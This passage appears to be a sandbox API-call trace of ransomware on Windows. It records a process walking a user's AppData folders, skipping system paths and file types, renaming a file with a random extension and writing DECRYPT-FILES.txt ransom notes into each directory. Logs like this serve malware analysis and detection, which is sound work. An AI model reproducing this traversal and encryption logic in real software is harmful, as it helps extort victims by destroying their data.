lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0077.352] lstrcpyA (in: lpString1=0x3f2c304, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0077.352] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0077.352] lstrcpyA (in: lpString1=0x3f2c304, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0077.352] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0077.352] lstrcpyA (in: lpString1=0x3f2c304, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0077.352] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0077.352] lstrcpyA (in: lpString1=0x3f2c304, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0077.352] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0077.352] lstrcpyA (in: lpString1=0x3f2c304, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0077.352] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0077.352] lstrcpyA (in: lpString1=0x3f2c304, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0077.352] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0077.352] lstrcpyA (in: lpString1=0x3f2c304, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0077.352] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0077.352] lstrcpyA (in: lpString1=0x3f2c304, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0077.352] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0077.353] lstrcpyA (in: lpString1=0x3f2c304, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0077.353] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0077.353] lstrcpyA (in: lpString1=0x3f2c304, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0077.353] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0077.353] lstrcpyA (in: lpString1=0x3f2c304, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0077.353] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0077.353] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned 121 [0077.353] wsprintfW (in: param_1=0x3f2cfbc, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.5jisz") returned 127 [0077.353] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.5jisz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.5jisz"), dwFlags=0x0) returned 1 [0077.353] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.355] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.356] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.356] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x1d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.sol", cAlternateFileName="")) returned 0 [0077.356] FindClose (in: hFindFile=0x5f8dd8 | out: hFindFile=0x5f8dd8) returned 1 [0077.356] CloseHandle (hObject=0x468) returned 1 [0077.356] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sys\\", cAlternateFileName="")) returned 0 [0077.356] FindClose (in: hFindFile=0x5f8d98 | out: hFindFile=0x5f8d98) returned 1 [0077.356] CloseHandle (hObject=0x460) returned 1 [0077.357] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4a4a40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4a4a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.357] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.357] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.357] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.357] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.357] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.357] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.357] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.357] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.357] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.357] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.357] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.357] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.357] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.357] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.357] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.357] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\") returned 93 [0077.357] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.357] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\" [0077.357] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\jkbimi8.tmp" [0077.357] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.357] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.358] CloseHandle (hObject=0x0) returned 0 [0077.358] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.358] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4a4a40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4a4a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.358] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0077.358] CloseHandle (hObject=0x458) returned 1 [0077.359] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d241020, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x6d9d7640, ftLastAccessTime.dwHighDateTime=0x1d2dda5, ftLastWriteTime.dwLowDateTime=0x6d9d7640, ftLastWriteTime.dwHighDateTime=0x1d2dda5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="support\\", cAlternateFileName="")) returned 0 [0077.359] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0077.359] CloseHandle (hObject=0x450) returned 1 [0077.359] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x6d241020, ftLastAccessTime.dwHighDateTime=0x1d2dda5, ftLastWriteTime.dwLowDateTime=0x6d241020, ftLastWriteTime.dwHighDateTime=0x1d2dda5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="macromedia.com\\", cAlternateFileName="MACROM~1.COM")) returned 0 [0077.359] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0077.359] CloseHandle (hObject=0x448) returned 1 [0077.359] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa458780, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa458780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa458780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.359] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.359] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.360] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.360] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.360] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.360] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.360] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.360] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.360] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.360] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.360] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.360] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.360] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.360] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.360] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.360] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\") returned 57 [0077.360] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.360] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\" [0077.360] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\jkbimi8.tmp" [0077.360] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.360] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.360] CloseHandle (hObject=0x0) returned 0 [0077.360] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.361] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa458780, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa458780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa458780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.361] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0077.361] CloseHandle (hObject=0x440) returned 1 [0077.361] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8d940a0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x8d940a0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0077.361] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0077.361] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0077.361] lstrcatW (in: lpString1="Microsoft", lpString2="\\" | out: lpString1="Microsoft\\") returned="Microsoft\\" [0077.361] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Microsoft\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\" [0077.361] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\Program Files") returned 0x0 [0077.361] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch=":\\Windows") returned 0x0 [0077.361] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\Games\\") returned 0x0 [0077.361] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.361] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.361] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.361] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.361] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.361] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\All Users") returned 0x0 [0077.362] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.362] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.362] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.362] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="AhnLab") returned 0x0 [0077.362] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.362] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\") returned 56 [0077.362] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.362] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\\\jkbimi8.tmp") returned 68 [0077.362] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0077.362] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\") returned 56 [0077.362] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.362] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\\\DECRYPT-FILES.txt") returned 74 [0077.362] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0077.363] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e434, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e434*=0x23fc, lpOverlapped=0x0) returned 1 [0077.364] CloseHandle (hObject=0x444) returned 1 [0077.365] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\") returned 56 [0077.365] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\*" [0077.365] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa516e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa516e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0077.365] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.365] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa516e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa516e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.365] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.365] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.365] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7c36290, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x7c36290, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x7c36290, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddIns", cAlternateFileName="")) returned 1 [0077.365] lstrcmpW (lpString1="AddIns", lpString2=".") returned 1 [0077.365] lstrcmpW (lpString1="AddIns", lpString2="..") returned 1 [0077.365] lstrcatW (in: lpString1="AddIns", lpString2="\\" | out: lpString1="AddIns\\") returned="AddIns\\" [0077.365] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="AddIns\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\" [0077.365] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\Program Files") returned 0x0 [0077.365] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch=":\\Windows") returned 0x0 [0077.365] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\Games\\") returned 0x0 [0077.365] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.365] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.365] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.365] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.365] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.365] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\All Users") returned 0x0 [0077.365] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.365] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.365] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.365] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="AhnLab") returned 0x0 [0077.365] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.365] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\") returned 63 [0077.365] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.365] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\\\jkbimi8.tmp") returned 75 [0077.365] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\addins\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0077.367] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS 